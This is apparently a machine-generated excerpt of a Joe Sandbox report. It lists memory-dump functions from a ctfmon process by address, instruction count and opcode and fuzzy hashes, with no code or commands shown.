Function 00007FF848F4085D Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf28295d8679345fcd47ab53b83c4e41ceeb7fbdd1fdaadd5424908792ddb924
Instruction ID: 9a06960a479f61a1c9c6059ecb5053a100b3d3bdbb322c4a6b6aac10fb393958
Opcode Fuzzy Hash: bf28295d8679345fcd47ab53b83c4e41ceeb7fbdd1fdaadd5424908792ddb924
Instruction Fuzzy Hash: F101003190C68E9EE782FB7889885A87BE0EFA5740F2504B3D808D60D3EA24A4458294

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F525EB Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 564d3407908ed7dc498d639c315750ffe6f85afce65469fd39aecc42e7d33525
Instruction ID: 8cde44f9932597fb4a80430f022b6ef5948ced1fdc938166ff6bf023f27e5b8d
Opcode Fuzzy Hash: 564d3407908ed7dc498d639c315750ffe6f85afce65469fd39aecc42e7d33525
Instruction Fuzzy Hash: 4311DD3084D7894FDB5AAB6088692E9BFA0FF16302F4501BAD40AC60E3EB386542C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F54B15 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f96a76b37767aa9b1d6581c718911598645adff850579c8ef40d4e980d4fb57c
Instruction ID: 8e94bba7c8fbcf467d2db077ab553eb1c2be26dd23c556a213eca370aaa29d40
Opcode Fuzzy Hash: f96a76b37767aa9b1d6581c718911598645adff850579c8ef40d4e980d4fb57c
Instruction Fuzzy Hash: 5411C171C0DA899FEB99EB6498AA2B8BBA0FF69305F0504FEC00DC75D3DB296444C705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4BE4D Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f4a000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d22846f21646073756d37b573225208049fe31ab6e00592446e2862f6e76c09
Instruction ID: 411364d39685277e854cd0eab77556a51f900ad3f222150b83ce1c86e491f311
Opcode Fuzzy Hash: 3d22846f21646073756d37b573225208049fe31ab6e00592446e2862f6e76c09
Instruction Fuzzy Hash: F021D570D1920A8FEB58EF94D8906EDBBB1BF68750F10003EE419B32D1CB386980CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F57441 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F57000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F57000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f57000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7341d09767dd5204555982342fa2d2a9bf7d338fd4a6f6787db28852ec6e8b7
Instruction ID: 1fbbb5b03b586f04d8ebe518a7fe9ec5a608f0108c1ea53c53b47e14ccd859c4
Opcode Fuzzy Hash: e7341d09767dd5204555982342fa2d2a9bf7d338fd4a6f6787db28852ec6e8b7
Instruction Fuzzy Hash: C5113C3090C98E9FE751FBB8C8586A9BFE4FF1A341F0508B6D409C7092EB38A590C759

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4359B Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2531c2d83a4b7e174d17a18abd89d616a87c34c852da51a60f263be11f77e871
Instruction ID: 36f05732870444f6a767fd4826c6d250bcda658b16ee6740f071c4f089c58591
Opcode Fuzzy Hash: 2531c2d83a4b7e174d17a18abd89d616a87c34c852da51a60f263be11f77e871
Instruction Fuzzy Hash: 6411917090D98B8EEB59AB28C519AB977A0FF29745F0408BEC00EE30D2DF3964018B18

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F54F29 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c2518ebbef876c5b1833cffa6c942747f491a8785072d9d111111082e7a7a83
Instruction ID: cbb2e67d6c232d43f1c30fc455cd0f48ec2ad5bd4ed17388e9f8e496f6eb2a44
Opcode Fuzzy Hash: 5c2518ebbef876c5b1833cffa6c942747f491a8785072d9d111111082e7a7a83
Instruction Fuzzy Hash: 77118B7080D68A8FEB85EB2888692B9BBF0FF29341F0404BAC409C75D2DB286444CB15

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F527D1 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47abb671c8a99a3eefcf6536c288eccf2e8639727f3226f0110cd2f1a78ee7c5
Instruction ID: 6212fae8c6ab8ff36bf9212f968b8627df629b780982ac3dc85f0c14b073d75f
Opcode Fuzzy Hash: 47abb671c8a99a3eefcf6536c288eccf2e8639727f3226f0110cd2f1a78ee7c5
Instruction Fuzzy Hash: BF11613090D59A9EE742FBB8885C5F9BBE0FF19341F1445B7D418C7096EB34A145C745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F54C3D Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 254de7781436698210f55c7900c7456fff449d8ecc5e75d6efdbcb59681ad144
Instruction ID: ef36aeaf5efcd0ee79e11d342f10d0108750fc44f7618f3f39bdc2c976946d52
Opcode Fuzzy Hash: 254de7781436698210f55c7900c7456fff449d8ecc5e75d6efdbcb59681ad144
Instruction Fuzzy Hash: F0119D7080DA8A9FEB89EB6484692BEBBA0FF69301F0404BEC009C71D3DB39A440C715

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F434F5 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f1812b146402cf553d1569623133098efad48375deadc689e1d7c7ec40b15ac
Instruction ID: bd0b574fcadcf63dfd28259c0e0e1eeb4b84c71f1921263e9547c3895a45c931
Opcode Fuzzy Hash: 9f1812b146402cf553d1569623133098efad48375deadc689e1d7c7ec40b15ac
Instruction Fuzzy Hash: 6A115E7091C68E8FDB59EF688459ABD7BA0FF28701F4404BFD419D61D1DB35A540C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F54E9D Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e5d1c349487bb487c3482982dd1a2875b00770587885d83098e91c50dd0f971
Instruction ID: 1a562f43c5e0b1db778483b9414b958777866bb93131bfc2db9e2acf4c574baf
Opcode Fuzzy Hash: 0e5d1c349487bb487c3482982dd1a2875b00770587885d83098e91c50dd0f971
Instruction Fuzzy Hash: C811BF7080D68A8FEB49EB2484696BDBBE0FF28301F0404BAC409C35D2DB29A580C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4BCE5 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f4a000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c6fd7d561140d6adc69406333487fac7dc29a78c774f0a8f87a9f6a648b3ccf
Instruction ID: 44e9262e12b2f1f6381b6e198635941de44241bb9e330ee538a31b52f3994b08
Opcode Fuzzy Hash: 9c6fd7d561140d6adc69406333487fac7dc29a78c774f0a8f87a9f6a648b3ccf
Instruction Fuzzy Hash: 2A113C3091964E8FDB89EF6488592BDBBF0FF28341F4004BBD419D61D2DB76A540C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F42E61 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 317d417048e4cd3c0aa0453289d0641598fa12349dcbb66b2642fbf8130b82e8
Instruction ID: 39b7b6a333df80e789d2972c8317a967f06798215ccf8776e64201fefbe87986
Opcode Fuzzy Hash: 317d417048e4cd3c0aa0453289d0641598fa12349dcbb66b2642fbf8130b82e8
Instruction Fuzzy Hash: 54017830D0D68E8FE751FBA888486A97BE0EF69741F0508B7D40CD71E2EB38E4448704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F405D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f42d68f278fc2483fc8c058a63aa679ecc70ae1ece36717991fd801a36c8e0f9
Instruction ID: dcc513c825db2bbd0fe3fb518d8d6dd7d6c010302c176580c203d6826ad00882
Opcode Fuzzy Hash: f42d68f278fc2483fc8c058a63aa679ecc70ae1ece36717991fd801a36c8e0f9
Instruction Fuzzy Hash: 3C019E3090851E8FEB48EF24C4596FA77A1FF68345F10047ED40ED21D1CB35A5A0CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F52275 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f51000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33e6eae8c3f8eb473bb8dbbcff60e74a39e358681033e1c394abc47b523c4f5f
Instruction ID: 7b098906ba953d3b06d053530b4e736c5a39e968159a508d97cb05556884248d
Opcode Fuzzy Hash: 33e6eae8c3f8eb473bb8dbbcff60e74a39e358681033e1c394abc47b523c4f5f
Instruction Fuzzy Hash: 8301DF3084D6899FEB49EF74C4586BABBA0FF1A300F0109BAD41AC60D3EF35A554CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F57D31 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F57000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F57000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f57000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19c436eaabd68f721ae6ccc81f5875a565f44bb2641a53cec41e36ac73e8ec4e
Instruction ID: 38b5569aaad00b5f865f2169d9678d8bfbf32a1495b7dd4c01d816af275d8a37
Opcode Fuzzy Hash: 19c436eaabd68f721ae6ccc81f5875a565f44bb2641a53cec41e36ac73e8ec4e
Instruction Fuzzy Hash: B701BC3085EA898FDB49EF24C8692BDBBA0FF19340F0404BED40AC65D6DF79A540C744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4283D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efbfc4a7481ff57338bcf68976f3bba4be0ab26dd489d8895032a2d3c6459bae
Instruction ID: ddf848f43f2e9c0337686f97f9af5b7a1739ed0627013854cd124387e17e58e2
Opcode Fuzzy Hash: efbfc4a7481ff57338bcf68976f3bba4be0ab26dd489d8895032a2d3c6459bae
Instruction Fuzzy Hash: 6F01783085D64E8FE795BBA488886A97BE0EF69741F5505B7D808D60A2EB38E0848704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F57DAD Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F57000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F57000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f57000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0ca26ac9753f80b04bad789a582cdcc4179f05691e27ae05f9ef696f1b63cc5
Instruction ID: 4492494568f7a5bc62c10929a6e3758502f9e01dac361b2c205649a9a059d152
Opcode Fuzzy Hash: c0ca26ac9753f80b04bad789a582cdcc4179f05691e27ae05f9ef696f1b63cc5
Instruction Fuzzy Hash: 09019E3190DA898FDB4AEB3484596BABBA0FF19340F0504BED40AC61D3DF25A950C755

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F42ED9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fee1fe5919b80fa70b88536cf1758a6334b40a36ccc3024810dba7e8f91ad1f
Instruction ID: ad19472d6d264e79e2db892d39285c6c94b4615638b1322728a78ef147a402b4
Opcode Fuzzy Hash: 6fee1fe5919b80fa70b88536cf1758a6334b40a36ccc3024810dba7e8f91ad1f
Instruction Fuzzy Hash: AF017C3191D6899FE742FB7488592A97FE0EF6A750F4604B7D408DB0E6EB38A4448711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4AB15 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f4a000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d239ffec8a81d17551f4636694669702a646584c512c43e0ac0194374d843665
Instruction ID: c8fe383a44ad006fa0cfcaf45e4a5e95acf54d17eb3d2d1f642897d8a98186fc
Opcode Fuzzy Hash: d239ffec8a81d17551f4636694669702a646584c512c43e0ac0194374d843665
Instruction Fuzzy Hash: 8FF0FC36A0E3964FD313A72DBCE11DA7B74EFA2168B0943B7C184CA0D3DA1D944E43A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F575C9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F57000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F57000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f57000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4eec6d97927537bac5d97569eb5a38ebb7fb8044c9ec3755f70b85f70bd21c0
Instruction ID: fe6e1db1a0c77775663900e8efb41e135e7bb39812823e358afee477d6dab3dd
Opcode Fuzzy Hash: e4eec6d97927537bac5d97569eb5a38ebb7fb8044c9ec3755f70b85f70bd21c0
Instruction Fuzzy Hash: 32017C7084EA8A5FE742AB2888591A9BBE0EF1A340F0508B2D408C70A3EB28A4488705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4AAA9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f4a000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39a99d7293ba47454e49b6437cd3a2708a2a06c04b9f451492a671d145985d0c
Instruction ID: 6e40d9300ae58805606dcdf1f221288430384cdeb5c50232c16ff00fa8de6c96
Opcode Fuzzy Hash: 39a99d7293ba47454e49b6437cd3a2708a2a06c04b9f451492a671d145985d0c
Instruction Fuzzy Hash: 3A018F3194D6898FE752BB34895D5A97BE0EF29380F0509F3D008D70E2EB78A484C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F40608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22eecbe54fe0cb3e7804a29ae1bce0dc80a6c23ec6cdec6adc2a67d3417e1cf9
Instruction ID: f3ffc43dc4e63e21e66d8fd6abc9e6c039388ab25f096b3bfa77127e0db8fce2
Opcode Fuzzy Hash: 22eecbe54fe0cb3e7804a29ae1bce0dc80a6c23ec6cdec6adc2a67d3417e1cf9
Instruction Fuzzy Hash: 9501693091860E9EEB59FBA484586BE7AA1FF28345F60087EE40ED21D1DF35A590C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F40610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6af41eb60cda603a6f4c19a9b9a772ab453c0d1307fa3d8260b2376214e99334
Instruction ID: bb868f3190093210850f3154d1191cf9a9ee4a00bd7afce8ed0b0c5af7cbd05a
Opcode Fuzzy Hash: 6af41eb60cda603a6f4c19a9b9a772ab453c0d1307fa3d8260b2376214e99334
Instruction Fuzzy Hash: 21016930918A0E9FEB59EB6484592BDB7E0FF28345F20087FE40ED21D1DF39A550C614

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F41BED Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d0da3de76ee3d48bb916061eca11683fc3d8f9f956905b3d35f28ede79ad190
Instruction ID: 42002dcc3f9552b7c6b2699d7b7df4f49da2da5d7d6a87580818cf059423d7a8
Opcode Fuzzy Hash: 9d0da3de76ee3d48bb916061eca11683fc3d8f9f956905b3d35f28ede79ad190
Instruction Fuzzy Hash: 7401AD3080D69D8FEB99EF2488552B93BA0FF65741F4401BAE808D21D2DB399490C744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F405D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f03b64c41de2b98d88230dfec549a526cca3089ad8813b0ce672a25ef9e228c
Instruction ID: fc8720494a0a633004d9522744c1b5316c87087321820f00300cd903f8cc78fd
Opcode Fuzzy Hash: 6f03b64c41de2b98d88230dfec549a526cca3089ad8813b0ce672a25ef9e228c
Instruction Fuzzy Hash: F3F0C23080E65E8FEB44EF2498052FA77A4FF25349F10053AE80DD21C1DB39A4A0CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4BE37 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f4a000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b560281b64557949bb1898814a498c69014c2f177a1c779df31e33e5358b09d3
Instruction ID: 9f6d19d9d6c4af0969197953f72c75a506bc67f83b3412139aeff2b17af85802
Opcode Fuzzy Hash: b560281b64557949bb1898814a498c69014c2f177a1c779df31e33e5358b09d3
Instruction Fuzzy Hash: 4E01C870D0960ACFDB18EF84D8906EDB7B1EF58360F24002ED516B32D1CB386951CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F42759 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a45c2048a6374ea9f62a5d3b07bc5d405797b5af9fee9bd9f61356afde6ad64e
Instruction ID: 9331fb1bef328260021cb88450374fa32e4cea764c156c5536e099f4ff581be5
Opcode Fuzzy Hash: a45c2048a6374ea9f62a5d3b07bc5d405797b5af9fee9bd9f61356afde6ad64e
Instruction Fuzzy Hash: 46F0C23180E38A8FEB5AAF6488582A93F61FF26701F5504BBD409C61D2DB38A404C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F57AB3 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F57000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F57000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f57000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66dc06c14206cfd4376411012926cb7b9d433b2ab96ead1f99d7498326dd81d3
Instruction ID: a31ba9f667cb77400013a8818445adee7186a5b2725efba2b635667d3a006196
Opcode Fuzzy Hash: 66dc06c14206cfd4376411012926cb7b9d433b2ab96ead1f99d7498326dd81d3
Instruction Fuzzy Hash: 68F03A35E1892D8BDB18EB98E8914FDB3B1FF98200F50013AD009A7282CF2469058B64

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F427CD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e871c621b8b7b770c02ba3a1b3ceb79e51975a53bb362657f1a78bff7911487f
Instruction ID: cb991cd6ff4d3f5321dbc34b0317e1c9249aec42cb1f8a66c9fa37092e6d827e
Opcode Fuzzy Hash: e871c621b8b7b770c02ba3a1b3ceb79e51975a53bb362657f1a78bff7911487f
Instruction Fuzzy Hash: 02F09A3181E68E8FEB59AF6488192BD7BA0FF26241F5505BBE809C60D2EB399454C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F41710 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3edcd640d88b40015f0de0df0a0e549db975d9348add14aa2e4d1e4220305169
Instruction ID: 6c5d3acea40b629729677d22d812f5cf73ec78ead578db8569acc776baa372dc
Opcode Fuzzy Hash: 3edcd640d88b40015f0de0df0a0e549db975d9348add14aa2e4d1e4220305169
Instruction Fuzzy Hash: 0BE06D30E1D8164EEA647318808467461D1EF647A4FB88276F01CDA1E1EB2CECC3C208

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4BEDE Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f4a000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f04f2779dc15e9edc6559c982889914b692a47402aa9b05ce8a8a289afef7063
Instruction ID: 432d5e93ef196a9f23c838344a8cc95463de74a6589011e1eb9f4e341ae95af7
Opcode Fuzzy Hash: f04f2779dc15e9edc6559c982889914b692a47402aa9b05ce8a8a289afef7063
Instruction Fuzzy Hash: 0CD04235A1892D8EDF40EBD8D8445EDB3B5FB68391F000126D51DE7295DB6068108B44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F451AE Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3266d8a40465b9dfa420b565482d1afff400db45b785ab8e3b603c6d57e198d7
Instruction ID: 93c248fdcfef05c52414fda2be3a277cffb0f78bfd57f1e62a18e9368a73f1cf
Opcode Fuzzy Hash: 3266d8a40465b9dfa420b565482d1afff400db45b785ab8e3b603c6d57e198d7
Instruction Fuzzy Hash: F9E09670D59E1D8EEBB5EB588C54BB9B6B1BB58642F5010EBC00DF2291DE356A809F04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F40FA5 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f40000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 129555fb15453bbe501c2a023fa41440675c4f96c51bdf7d57062042ca6b7e42
Instruction ID: d3dae9e30e6421af7457d754063c03ca448149e4cddaf30d03a1682437f5c9ec
Opcode Fuzzy Hash: 129555fb15453bbe501c2a023fa41440675c4f96c51bdf7d57062042ca6b7e42
Instruction Fuzzy Hash: 5BE0B63091A5298EE750EB148810BAEA6B1FF54344F5001B6D009A32C2DF3869408B58

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4B32B Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2206866169.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_7ff848f4a000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
